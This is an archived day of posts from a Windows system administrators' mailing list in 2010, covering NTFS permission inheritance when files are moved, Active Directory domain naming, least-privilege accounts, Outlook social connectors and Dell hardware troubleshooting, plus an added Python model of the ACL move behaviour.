Re: Ink & toner "cold callers"

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 4:30 PM, Jon Harris  wrote:
> There is a national list maintained by the feds for whatever use it is.

  That's semi-independent of the do-not-call lists telemarketers are
required to maintain.  The national DNC registry is relatively new,
and has more exemptions.  Organizations have been required to maintain
their own DNC lists for decades, and *I think* only charities are
exempt.

>> You can collect penalties to the tune of something like $200 per violation.
>
> I thought the price of a mistake was much higher but hey $200 per call ...

  Okay, you made me look it up.  :)  $500 per incident.

>... if I got it would be worth the time to get their number recorded and
> reported to the feds.  I wonder who gets the money sure ain't us.

  $500 is the amount of money *you* can collect.

  See: United States Code, Title 47, Chapter 5, Subchapter II, Part I,
Section 227, clause (b)(3)(B).

http://www.law.cornell.edu/uscode/47/usc_sec_47_0227000-.html#b_3

  You can also sue for damages, in much larger amounts, but that's
harder.  You have to prove the damage, i.e., that you lost money.  For
the above, you just have to prove the violation.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~



RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Ralph Smith
Sorry, I was just skimming through the messages and missed that.  Should have 
checked first. 

-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 11:18 PM
To: NT System Admin Issues
Subject: Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

On Wed, Apr 28, 2010 at 11:11 PM, Ralph Smith  
wrote:
> Does this address your issue?  This is from Article ID: 310316:

  Try about four messages back in the thread.  ;-)

  Thanks anyway.  :)

-- Ben





RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Ralph Smith
I also saw this on WinITPro
(http://www.windowsitpro.com/article/permissions/ntfs-inheritance-rule-change.aspx)
which is interesting.  One of the commenters states that it
is only changed when using the GUI, however.


Until recently, NTFS permissions have followed these inheritance rules:

   1. If a file or folder is copied to some other location, it will
inherit the new location's NTFS permissions.
   2. If a file or folder is moved to some other location on a different
disk drive, it will inherit the new location's NTFS permissions.
   3. If a file or folder is moved to some other location on the same
disk drive, it will retain the original location's NTFS permissions.

One of the NTFS inheritance rules changed in Windows 7, Windows Server
2008, and Windows Vista. Now if you move a file or folder, it will
inherit the new location's NTFS permissions, even if the new location is
on the same disk drive. This is a radical shift that you need to take
into account when you're moving files. You can find a reference to this
change in the Notes section in the Microsoft article "Inherited
permissions are not automatically updated when you move folders". 



-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 10:31 PM
To: NT System Admin Issues
Subject: Re: The finer points of NTFS ACLs (was: Software installs on
new PCs)

On Wed, Apr 28, 2010 at 5:35 PM, James Rankin 
wrote:
> I didn't know that you were asking users to actually perform the
> move... one of the benefits of us being a fairly small and linear
> organisation is that stuff doesn't tend to get moved from drive to
> drive too often.

  If it gets moved from "drive" to "drive", Windows actually implicitly
does a copy-then-delete, so that's fine.  It's moving between folders on
the same "drive" that causes the problem.

  For example, say we've got a folder like this, for our official
Quality Management System documentation:

N:\Quality\QMSDocs\

  Under there, we have sub-folders:

N:\Quality\QMSDocs\Drafts\
N:\Quality\QMSDocs\Current\
N:\Quality\QMSDocs\Obsolete\

  Everyone in the company can read "Current", but only members of the
"Quality Staff" group can read "Drafts" or "Current".  When a draft is
approved, the doc editor moves the file from "Drafts" to "Current".

  Problem is, Windows does not update the ACL on the file.  So nobody in
the rest of the company can open the file.  The doc editor has to
explicitly do a copy-then-delete.  Giant pain in the butt.

  I imagine this could be a security exposure, too.  If you've got
Bypass Traverse Checking turned on (which is the default), you can open
a file as long as you know its name.  So, hypothetically, some
unsuspecting user could move a file from an internal-public folder to a
nominally restricted folder.  But Windows would keep the old ACL.
Someone could guess the new location and still read/modify the file.
This is a fairly unlikely scenario, I think, but when it comes to
security, unlikely scenarios have a disturbing tendency to pay off.

  All Microsoft would need to do to fix this would be to make the "move"
system call check the ACL of the item being moved, remove any inherited
ACEs, and if it isn't set to block inheritance, propagate ACEs from the
new container.  If you're worried about unneeded write I/O, have it only
write the new ACL if it differs from the old ACL.
Make it a non-default option if you're concerned about performance or
backwards compatibility or whatever.

-- Ben




Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 11:11 PM, Ralph Smith  
wrote:
> Does this address your issue?  This is from Article ID: 310316:

  Try about four messages back in the thread.  ;-)

  Thanks anyway.  :)

-- Ben




Re: Current AD domain naming best practices

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 4:48 PM, Michael B. Smith  wrote:
> You won't get that for .int or .local.

  .int?  I take it some people are using that for "internal"?  Heh.  I
guess people have forgotten .int is a "real" top-level domain name.
It is used for international organizations.  Try http://www.nato.int/
to see it in action.

  This is why I recommend using a registered domain name, owned by the
organization, for all but the smallest of networks.  Better to avoid
the possibility of a name collision, even if it is remote.  You can
use a subdomain (corp.example.com) or a separate 2LD (example.com and
example.net), but follow DNS specifications and best practices.

  Of course, then you have the problem of corporate divestitures...

-- Ben



RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Ralph Smith
Does this address your issue?  This is from Article ID: 310316:

"How permissions are handled when you copy and move files and folders"

I haven't tried it myself.



"You can modify how Windows Explorer handles permissions when objects
are moved in the same NTFS volume. As mentioned, when an object is moved
within the same volume, the object preserves its permissions by default.
However, if you want to modify this behavior so that the object inherits
the permissions from the parent folder, modify the registry as follows:

   1. Click Start, click Run, type regedit, and then press ENTER.
   2. Locate and then click the following registry subkey:
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
   3. On the Edit menu, click Add Value, and then add the following
registry value:

  Value name: MoveSecurityAttributes
  Data type: DWORD
  Value data: 0
   4. Exit Registry Editor.
   5. Make sure that the user account that is used to move the object
has the Change Permissions permission set. If the permission is not set,
grant the Change Permissions permission to the user account.

Note The MoveSecurityAttributes registry value only applies to Windows
XP and to Windows Server 2003. The value does not affect Windows 2000."







-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 10:31 PM
To: NT System Admin Issues
Subject: Re: The finer points of NTFS ACLs (was: Software installs on
new PCs)

On Wed, Apr 28, 2010 at 5:35 PM, James Rankin 
wrote:
> I didn't know that you were asking users to actually perform the
> move... one of the benefits of us being a fairly small and linear
> organisation is that stuff doesn't tend to get moved from drive to
> drive too often.

  If it gets moved from "drive" to "drive", Windows actually implicitly
does a copy-then-delete, so that's fine.  It's moving between folders on
the same "drive" that causes the problem.

  For example, say we've got a folder like this, for our official
Quality Management System documentation:

N:\Quality\QMSDocs\

  Under there, we have sub-folders:

N:\Quality\QMSDocs\Drafts\
N:\Quality\QMSDocs\Current\
N:\Quality\QMSDocs\Obsolete\

  Everyone in the company can read "Current", but only members of the
"Quality Staff" group can read "Drafts" or "Current".  When a draft is
approved, the doc editor moves the file from "Drafts" to "Current".

  Problem is, Windows does not update the ACL on the file.  So nobody in
the rest of the company can open the file.  The doc editor has to
explicitly do a copy-then-delete.  Giant pain in the butt.

  I imagine this could be a security exposure, too.  If you've got
Bypass Traverse Checking turned on (which is the default), you can open
a file as long as you know its name.  So, hypothetically, some
unsuspecting user could move a file from an internal-public folder to a
nominally restricted folder.  But Windows would keep the old ACL.
Someone could guess the new location and still read/modify the file.
This is a fairly unlikely scenario, I think, but when it comes to
security, unlikely scenarios have a disturbing tendency to pay off.

  All Microsoft would need to do to fix this would be to make the "move"
system call check the ACL of the item being moved, remove any inherited
ACEs, and if it isn't set to block inheritance, propagate ACEs from the
new container.  If you're worried about unneeded write I/O, have it only
write the new ACL if it differs from the old ACL.
Make it a non-default option if you're concerned about performance or
backwards compatibility or whatever.

-- Ben




Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 4:55 PM, Ziots, Edward  wrote:
> Define “Properly Secured” because what is secured from one user's perspective
> is totally different than what another user thinks ...

  "Properly secured" would mean the accounts used for day-to-day
operations do not have permission to modify the system.  Principle of
least privilege.  A well-known and widely-recommended best practice
since roughly the 1960s.  As I went on to detail in my message.

> ... no ... computer for that matter can be 100% protected.

  I never claimed otherwise.  I wrote "properly secured", not
"perfectly secured".

  Did reading comprehension just drop sharply or something?  What is
it about this topic that makes people unable to follow a line of
reasoning?  It's like attack of the strawmen.  What next, "Macs are
more secure because Chewbacca is a Wookie"?

-- Ben




RE: Outlook 2010 - Social Connectors

2010-04-28 Thread Ben Schorr
I can't speak to the Facebook connector, as I haven't seen it yet, but
the LinkedIn connector does NOT send any info to LinkedIn about mail you
send/receive.  In fact what it does is download your LinkedIn contacts
list to a special Outlook Contacts folder.  All of the profile
synchronization/updating happens there.

 

Ben M. Schorr
Chief Executive Officer
__
Roland Schorr & Tower
www.rolandschorr.com  
b...@rolandschorr.com

 

 

From: James Hill [mailto:james.h...@superamart.com.au] 
Sent: Wednesday, April 28, 2010 4:04 PM
To: NT System Admin Issues
Subject: Outlook 2010 - Social Connectors

 

We are currently piloting Outlook 2010 and I'm interested in everyone's
thoughts on the Social Connectors.

 

Whilst not all of the connectors are available yet it won't be long
before they are.

 

What is interesting to me is that it opens up a much larger social/work
interconnect than we had before.  Whilst we allow staff to use Social
Networking apps like Facebook we also limit the amount of use to an hour
per day (so they can spend their whole lunch break on there if they
wish).  But with integration into business apps, Outlook, the potential
for interruption will be huge.

 

I'm also curious about the security implications:- 

 

* These programs may send the e-mail addresses from e-mail you send and
receive to third-party social networks. The social networks may use the
e-mail addresses to provide you activity feeds.

 

What's to stop this info being spread to other Facebook apps?  Farmtown
invites will be going to the CEO from their assistant's friends in no
time :)

 

Many businesses have a strict policy on social networking which results
in zero access.  We haven't taken that approach here as some research
suggests there MAY be benefits to allowing it.

 

Interesting times ahead.

 

 

 


Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 4:46 PM, Jon Harris  wrote:
>> " With the exception of exploitation of unpatched vulnerabilities,
>> I've never seen malware lead to a system compromise on a
>> properly-secured Win XP machine"
>
> Sorry but how many (l)users know how to do this?

  None.  I never claimed otherwise.  The statement I was responding to
was, "Even with users not in admin group in Windows XP, Vista I have
seen malware get right on and hose a machine."

> You can teach people not to click Okay or Yes ...

  Heh.  Maybe *you* can.  When it comes to lusers, I haven't had much
luck with that.  Especially for children or teenagers.  But then, I've
been working mainly in corporate IT for a number of years now.  Maybe
if it's a home luser who pays by the hour for fixing it's a different
story.

  http://www.bynkii.com/archives/2009/01/for_new_sysadminsit_types.html

-- Ben



Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 5:17 PM, Jon Harris  wrote:
> I used to run Office 2000 pro as non-admin without issues.

  Office 2000 couldn't edit images correctly without admin rights,
unless you manually granted permissions on a registry branch under
HKLM.  There was also some other stupid thing like that that I've
forgotten the details on.  I don't think I ever hit a problem with
Outlook, though.

  (The interesting part is that the Win 2000 Logo program required the
ability to run without admin rights, and Office 2000 carried the Win
2000 Logo.  Microsoft's official response was basically "Well, most of
it is compliant.")

-- Ben



Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Ben Scott
On Wed, Apr 28, 2010 at 5:35 PM, James Rankin  wrote:
> I didn't know that you were asking users to actually perform the move... one
> of the benefits of us being a fairly small and linear organisation is that
> stuff doesn't tend to get moved from drive to drive too often.

  If it gets moved from "drive" to "drive", Windows actually
implicitly does a copy-then-delete, so that's fine.  It's moving
between folders on the same "drive" that causes the problem.

  For example, say we've got a folder like this, for our official
Quality Management System documentation:

N:\Quality\QMSDocs\

  Under there, we have sub-folders:

N:\Quality\QMSDocs\Drafts\
N:\Quality\QMSDocs\Current\
N:\Quality\QMSDocs\Obsolete\

  Everyone in the company can read "Current", but only members of the
"Quality Staff" group can read "Drafts" or "Current".  When a draft is
approved, the doc editor moves the file from "Drafts" to "Current".

  Problem is, Windows does not update the ACL on the file.  So nobody
in the rest of the company can open the file.  The doc editor has to
explicitly do a copy-then-delete.  Giant pain in the butt.

  I imagine this could be a security exposure, too.  If you've got
Bypass Traverse Checking turned on (which is the default), you can
open a file as long as you know its name.  So, hypothetically, some
unsuspecting user could move a file from an internal-public folder to a
nominally restricted folder.  But Windows would keep the old ACL.
Someone could guess the new location and still read/modify the file.
This is a fairly unlikely scenario, I think, but when it comes to
security, unlikely scenarios have a disturbing tendency to pay off.

  All Microsoft would need to do to fix this would be to make the
"move" system call check the ACL of the item being moved, remove any
inherited ACEs, and if it isn't set to block inheritance, propagate
ACEs from the new container.  If you're worried about unneeded write
I/O, have it only write the new ACL if it differs from the old ACL.
Make it a non-default option if you're concerned about performance or
backwards compatibility or whatever.

-- Ben
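
Added example, not part of the message above and not Microsoft or Windows API code: a small Python model of the same-volume move behaviour described in this thread and of the fix proposed in the last paragraph, plus an audit check for files whose inherited ACEs no longer match their parent. The names (Ace, Folder, File, move_keep_acl, move_reinherit, is_stale) are hypothetical, and the model is allow-only (no deny ACEs, no CREATOR OWNER substitution).

```python
"""Toy model of NTFS ACL handling on a same-volume move (constructed example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Ace:
    trustee: str             # group name, e.g. "Quality Staff"
    rights: frozenset        # subset of {"read", "write"}
    inherited: bool = False  # True when the ACE came from a parent container


@dataclass
class Folder:
    name: str
    inheritable: tuple       # ACEs this folder propagates to its children


@dataclass
class File:
    name: str
    parent: Folder
    acl: tuple = ()
    protected: bool = False  # "block inheritance" is set on the file
    acl_writes: int = 0      # counts ACL rewrites, to show the I/O saving


RW = frozenset({"read", "write"})
RO = frozenset({"read"})
# Constructed sample layout, modelled on the QMSDocs folders in the message.
DRAFTS = Folder("Drafts", (Ace("Quality Staff", RW),))
CURRENT = Folder("Current", (Ace("Quality Staff", RW), Ace("Everyone", RO)))
OBSOLETE = Folder("Obsolete", (Ace("Quality Staff", RW),))


def propagated(folder):
    """ACEs a child of `folder` receives, flagged as inherited."""
    return tuple(Ace(a.trustee, a.rights, True) for a in folder.inheritable)


def create(folder, name):
    """A new file picks up the container's inheritable ACEs."""
    return File(name, folder, propagated(folder))


def move_keep_acl(f, dest):
    """Same-volume move as described in the thread: the ACL travels unchanged."""
    f.parent = dest


def move_reinherit(f, dest):
    """Proposed fix: drop inherited ACEs, re-propagate from the new container
    unless inheritance is blocked, and write only if the ACL really changed."""
    explicit = tuple(a for a in f.acl if not a.inherited)
    new_acl = explicit if f.protected else explicit + propagated(dest)
    f.parent = dest
    if set(new_acl) != set(f.acl):
        f.acl = new_acl
        f.acl_writes += 1


def can(f, groups, right):
    """Allow-only check: an ACE for one of the caller's groups grants `right`."""
    return any(a.trustee in groups and right in a.rights for a in f.acl)


def is_stale(f):
    """Audit check: inherited ACEs differ from what the current parent propagates."""
    if f.protected:
        return False
    return {a for a in f.acl if a.inherited} != set(propagated(f.parent))


def demo():
    """Run both directions of the move under both behaviours."""
    staff = {"Everyone"}  # an ordinary employee, not in "Quality Staff"
    approved = create(DRAFTS, "procedure.doc")
    move_keep_acl(approved, CURRENT)       # Drafts -> Current, ACL kept
    withdrawn = create(CURRENT, "old.doc")
    move_keep_acl(withdrawn, DRAFTS)       # Current -> Drafts, ACL kept
    fixed = create(CURRENT, "old2.doc")
    move_reinherit(fixed, DRAFTS)          # Current -> Drafts, ACL rebuilt
    same = create(DRAFTS, "retired.doc")
    move_reinherit(same, OBSOLETE)         # identical ACL, so no write
    return {
        "approved_readable_by_staff": can(approved, staff, "read"),
        "withdrawn_still_readable": can(withdrawn, staff, "read"),
        "stale_found": [f.name for f in (approved, withdrawn, fixed, same)
                        if is_stale(f)],
        "fixed_readable_by_staff": can(fixed, staff, "read"),
        "writes": (fixed.acl_writes, same.acl_writes),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```
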



Outlook 2010 - Social Connectors

2010-04-28 Thread James Hill
We are currently piloting Outlook 2010 and I'm interested in everyone's 
thoughts on the Social Connectors.

Whilst not all of the connectors are available yet it won't be long before they are.

What is interesting to me is that it opens up a much larger social/work 
interconnect than we had before.  Whilst we allow staff to use Social 
Networking apps like Facebook we also limit the amount of use to an hour per 
day (so they can spend their whole lunch break on there if they wish).  But with 
integration into business apps, Outlook, the potential for interruption will be 
huge.

I'm also curious about the security implications:-

* These programs may send the e-mail addresses from e-mail you send and receive 
to third-party social networks. The social networks may use the e-mail 
addresses to provide you activity feeds.

What's to stop this info being spread to other Facebook apps?  Farmtown invites 
will be going to the CEO from their assistant's friends in no time :)

Many businesses have a strict policy on social networking which results in zero 
access.  We haven't taken that approach here as some research suggests there 
MAY be benefits to allowing it.

Interesting times ahead.



Re: Webster is now employed

2010-04-28 Thread Sean Houston
Congrats Webster!  Good luck at LPS.

-Sean
On Wed, Apr 28, 2010 at 6:19 PM, Malcolm Reitz wrote:

>  Excellent – congrats! Post a pic of you in your “green beret” :-)
>
>
>
> -Malcolm
>
>
>
> *From:* Webster [mailto:webs...@carlwebster.com]
> *Sent:* Tuesday, April 27, 2010 21:06
>
> *To:* NT System Admin Issues
> *Subject:* Webster is now employed
>
>
>
> *Webster is now employed by LPS Integration in Nashville, TN as Sr. Citrix
> Technical Architect.  I start Friday May 7th.
> http://www.lpsintegration.com/*
>
>
>
>
>
> Carl Webster
>
> Citrix Technology Professional
>
> http://dabcc.com/Webster
>
>
>
>
>
>
>
>
>
>
>
>


-- 
Sean Houston
216-798-4476
IT Specialist
CompTIA A+, Security+, Network+, Server+


RE: Webster is now employed

2010-04-28 Thread Malcolm Reitz
Excellent - congrats! Post a pic of you in your "green beret" :-)

 

-Malcolm

 

From: Webster [mailto:webs...@carlwebster.com] 
Sent: Tuesday, April 27, 2010 21:06
To: NT System Admin Issues
Subject: Webster is now employed

 

Webster is now employed by LPS Integration in Nashville, TN as Sr. Citrix
Technical Architect.  I start Friday May 7th. http://www.lpsintegration.com/

 

 

Carl Webster

Citrix Technology Professional

http://dabcc.com/Webster

 

 

 


RE: Dell Docking Station mystery

2010-04-28 Thread Charlie Kaiser
Don't know about that model but I remember seeing this on the old Latitudes.
Bent pins in the dock connectors. I was able to gently straighten most of
them...
Seems the first thing to fail was always connectivity...

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: Bill Lambert [mailto:blamb...@concuity.com] 
> Sent: Wednesday, April 28, 2010 3:19 PM
> To: NT System Admin Issues
> Subject: Dell Docking Station mystery
> 
> I have a weird issue with a D530.  The user docks her laptop 
> into a Dell D Port every day and today she undocked it to go 
> wireless at a meeting.  When she came back and docked, the 
> wireless connection was working but when she tried to enable 
> her wired nic, she gets 'connection failed'.  Tried different 
> dports and same results. Everything works great when 
> undocked.  Has anyone seen this and know a solution?
> 
>  
> 
> Thanks!
> 
>  
> 
> Bill Lambert
> 
> Windows System Administrator
> 
> Concuity
> 
> Phone  847-941-9206
> 
> Fax  847-465-9147
> 


Re: Dell MD1000

2010-04-28 Thread Ben N
We have about 6 of them total here. They are pretty good for the money. They
have two places in which to plug in the external SAS cable. We have the Perc
6/E cards for the servers that have these attached. Fits 15 drives. We have
some configs where two servers share the same MD1000 too. There is a switch
you use to split it, so one MD1000 controller has 7 drives and the other
controller has 8 drives. This is static, you don't get to pick the drives
or how many. We have a few that are all 750GB SATA and some that are all
300GB SAS.

-Ben

On Wed, Apr 28, 2010 at 3:05 PM, Richard Stovall  wrote:

> The MD3000, while much more flexible, is out of the price range for this
> project.  I was thinking of a server with a Perc 6/E attached to the MD1000.
>  So I guess I'm asking about the combination of Perc 6/E + MD1000.
>
>
> On Wed, Apr 28, 2010 at 3:46 PM, Anders Blomgren wrote:
>
>> The MD1000 is just a SAS enclosure without any controller at all. Are you
>> asking about the MD3000 or the Perc6 raid card that actually drives an
>> MD1000?
>>
>> -Anders
>>
>> On Wed, Apr 28, 2010 at 9:33 PM, Richard Stovall wrote:
>>
>>> Anyone have one (or more) of the Dell MD1000s?  Any comments, good or
>>> ill?
>>>
>>> I'm thinking about creating a new file server and this is a relatively
>>> inexpensive option from a big vendor.
>>>
>>> Thanks,
>>> RS
>>>
>>>
>>>
>>>
>>>
>>>
>>
>>
>>
>>
>>
>
>
>
>
>


RE: Dell Docking Station mystery

2010-04-28 Thread John Cook
No specific experiences but I would update the BIOS as a first item.

John W. Cook
Systems Administrator
Partnership For Strong Families
315 SE 2nd Ave
Gainesville, Fl 32601
Office (352) 393-2741 x320
Cell (352) 215-6944
Fax (352) 393-2746
MCSE, MCTS, MCP+I, A+, N+, VSP4, VTSP4

From: Bill Lambert [mailto:blamb...@concuity.com]
Sent: Wednesday, April 28, 2010 6:19 PM
To: NT System Admin Issues
Subject: Dell Docking Station mystery

I have a weird issue with a D530.  The user docks her laptop into a Dell D Port 
every day and today she undocked it to go wireless at a meeting.  When she came 
back and docked, the wireless connection was working but when she tried to 
enable her wired nic, she gets 'connection failed'.  Tried different dports and 
same results. Everything works great when undocked.  Has anyone seen this and 
know a solution?

Thanks!

Bill Lambert
Windows System Administrator
Concuity
Phone  847-941-9206
Fax  847-465-9147

Dell Docking Station mystery

2010-04-28 Thread Bill Lambert
I have a weird issue with a D530.  The user docks her laptop into a Dell
D Port every day and today she undocked it to go wireless at a meeting.
When she came back and docked, the wireless connection was working but
when she tried to enable her wired nic, she gets 'connection failed'.
Tried different dports and same results. Everything works great when
undocked.  Has anyone seen this and know a solution?

 

Thanks!

 

Bill Lambert

Windows System Administrator

Concuity

Phone  847-941-9206

Fax  847-465-9147

 

 

 


Re: Dell MD1000

2010-04-28 Thread Richard Stovall
The MD3000, while much more flexible, is out of the price range for this
project.  I was thinking of a server with a Perc 6/E attached to the MD1000.
 So I guess I'm asking about the combination of Perc 6/E + MD1000.

On Wed, Apr 28, 2010 at 3:46 PM, Anders Blomgren wrote:

> The MD1000 is just a SAS enclosure without any controller at all. Are you
> asking about the MD3000 or the Perc6 raid card that actually drives an
> MD1000?
>
> -Anders
>
> On Wed, Apr 28, 2010 at 9:33 PM, Richard Stovall wrote:
>
>> Anyone have one (or more) of the Dell MD1000s?  Any comments, good or ill?
>>
>>
>> I'm thinking about creating a new file server and this is a relatively
>> inexpensive option from a big vendor.
>>
>> Thanks,
>> RS
>>
>>
>>
>>
>>
>>
>
>
>
>
>


Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

2010-04-28 Thread Steven Peck
Here as well.  NT3.51, 4, 2k, etc.

On Wed, Apr 28, 2010 at 2:17 PM, Jon Harris  wrote:
> I used to run Office 2000 pro as non-admin without issues.
>
> Jon
>
> On Wed, Apr 28, 2010 at 3:51 PM, Ben Scott  wrote:
>>
>> On Wed, Apr 28, 2010 at 1:19 PM, David Lum  wrote:
>> > ... I have Outlook 2003 working for non-admins and have for some years
>> > now.
>>
>>  Same here.  We've been running Outlook 2003 without admin rights
>> since it was released.  Come to think of it, I'm not sure I've *ever*
>> run Outlook 2003 as an admin, even for installation.
>>
>> -- Ben
>>
>
>
>
>




Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread James Rankin
I didn't know that you were asking users to actually perform the move... one
of the benefits of us being a fairly small and linear organisation is that
stuff doesn't tend to get moved from drive to drive too often.

On 28 April 2010 21:04, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 12:55 PM, James Rankin wrote:
> > I don't know whether removing Creator Owner from the ACL actually updates
> > or changes the owner in any way.
>
>   It doesn't change the owner, but that doesn't matter.  "CREATOR
> OWNER" is a magic ACE that turns into whatever the owner is/was set to
> when the ACL is applied.  Simply remove the "CREATOR OWNER" ACE and
> avoid the problem entirely.
>
>  Why are you using "CREATOR OWNER" in an ACL in the first place?  I
> think that's your problem.
>
> > For preserving (or not) permissions on file moves, I find robocopy is the
> > way forward ...
>
>  Two problems with that: (1) Requires permission to set the ACL.  (2)
> Asking your typical user to use ROBOCOPY to move files is ridiculous.
>
> -- Ben



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."


Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Jon Harris
I read a Technet article written by the Scripting Guys and did just this for
PS.  They even recommended that it be run periodically just to keep some
help desk type or sort of knowledgeable user from messing up the perms.
They did offer some suggestions as to how often but they did not have a hard
or fast rule on the rerun.

Jon

On Wed, Apr 28, 2010 at 3:15 PM, Andrew S. Baker  wrote:

> Copy the files to the new location. Or, reapply the perms by script
>
> -ASB: http://XeeSM.com/AndrewBaker 
>
> Sent from my Motorola Droid
>
> On Apr 28, 2010 12:45 PM, "Ben Scott"  wrote:
>
> On Wed, Apr 28, 2010 at 11:54 AM, James Rankin wrote:
> > We see this problem where people create folders under shared drives, that
> > each new folder is owned by the creating user who then has the added
> > rights. The solution is some weekly subinacl tasks that re-take ownership
> > of the whole fileserver structure back to BUILTIN\Administrators
>
>  Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
> the folder?
>
>  All our shared folders are set so only the group(s) which should
> have permission are present.
>
>  The only good use for "CREATOR OWNER" I've found is kludging around
> apps that insist on writing to their own program directory.  So grant
> users "Create File" on "This folder only", and separately grant
> "CREATOR OWNER" "Modify" on "Files only".  Now users can create the
> file, but can't touch anything else.
>
>  My biggest beef is that if you move an object within a "drive" on
> Windows, Windows does not update the ACL on the object to reflect
> different permissions in its new location.  So, for example, when a
> file is moved from the QA-only pre-release folder to the whole-company
> general-release folder, the file still has permissions for pre-release
> and nobody else can read it.  Anyone got a fix for *that*?
>
> -- Ben

Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

2010-04-28 Thread Jon Harris
I used to run Office 2000 pro as non-admin without issues.

Jon

On Wed, Apr 28, 2010 at 3:51 PM, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 1:19 PM, David Lum  wrote:
> > ... I have Outlook 2003 working for non-admins and have for some years
> > now.
>
>  Same here.  We've been running Outlook 2003 without admin rights
> since it was released.  Come to think of it, I'm not sure I've *ever*
> run Outlook 2003 as an admin, even for installation.
>
> -- Ben

Re: WTF? Fake AV

2010-04-28 Thread Jon Harris
A small target vs a HUGE target?  Keep in mind the virus writers are or
could be as lazy as the Application developers.  If you have been writing
Windows viruses for years you tend to continue doing so until the target is
of little value.  If you are a developer you don't generally develop for 2
platforms only one and when you are a master at one you don't generally go
work on another until forced to.

That is human nature at work!

Jon

On Wed, Apr 28, 2010 at 4:33 PM, Mayo, Bill  wrote:

> Not sure what point you are disputing but 115 (total) versus 70,000 per day
> (your numbers from earlier today) is kind of lopsided.  I'm not saying that
> 115 isn't enough to worry about, but if 115 in 8 years is "growing fast",
> what in the world do you call 70,000 per day?!?!
>
> -Original Message-
> From: Stu Sjouwerman [mailto:s...@sunbelt-software.com]
> Sent: Wednesday, April 28, 2010 4:17 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> Erm, There are 115 known strains (and growing fast) of malware for the Mac.
> That's why we are releasing a VIPRE client for the Mac in Q2. They have sold
> enough machines to make it attractive for cyber crime to go after. All
> security models will break as per the principle of the 'bigger hammer'.
>
> Warm regards,
>
>
> Stu Sjouwerman
> Co-Founder, Publisher, Sunbelt Media
> P: +1-727-562-0101 ext 218
> F: +1-727-562-5199
> s...@sunbelt-software.com
>
>
>
>
>
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 4:10 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> And you are making the (rather dramatic, IMO) over generalization that
> Microsoft simply tells app vendors what to do and expects them to move at
> the drop of a hat.
>
> The reality is that MS has typically bent over backwards to ensure
> backwards compatibility (to a fault you may argue) for applications wherever
> possible. That has been one of the tenets of their OS design since Windows
> had DOS boxes.
>
>  They have compatibility flags within the OS to special case specific apps
> and installers. They have wow32 and wow64. They did FX!32 on Alpha.
> They've supported old versions of API's along with new versions. They allow
> unsigned hardware even though the new model requires signed hardware. Etc,
> etc...
>
> Heck, up until Vista you could still run something from 20 yr old DOS..
>
> Now would they LIKE apps vendors to comply with new direction day1? Yes.
> Do they all? No. So there is much notification, suggestion, development
> guidelines, DevCons, etc... to shepherd app vendors the right direction.
>
> Your "MS simply flips a switch and expects devs to comply" sentiment  is an
> inaccurate oversimplification.
>
> -sc
>
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 3:57 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare wrote:
> > > A) hardware driver models are a somewhat different beast, and that's
> > > held true for many a platform, and isn't really germane to what we
> > > are discussing here.
> >
> >   The only point I was making (and the one you're determined to
> > ignore, it appears): Microsoft routinely throws their weight around
> > to tell the rest of the industry to change to Microsoft's new way of
> > doing things.  Microsoft elected not to do that with security.
> >
> >   The question was asked (paraphrased): "Why did it take Microsoft so
> > long to do anything about security?"  I answered that question.  No
> > less, no more.  You're the one who keeps trying to drag the question
> > off into the weeds.
> >
> >   Of course, an equally valid question would be, "Why did it take
> > Apple so long to do anything about security?"  But that wasn't the
> > question I was addressing.
> >
> > > Using AV infection #'s to compare those things and draw the
> > > conclusion he did is not accurate, IMO.
> >
> >   That I would agree with.
> >
> > -- Ben

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Stu Sjouwerman
We will be releasing a detection for this PDF exploit in a couple of hours.

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
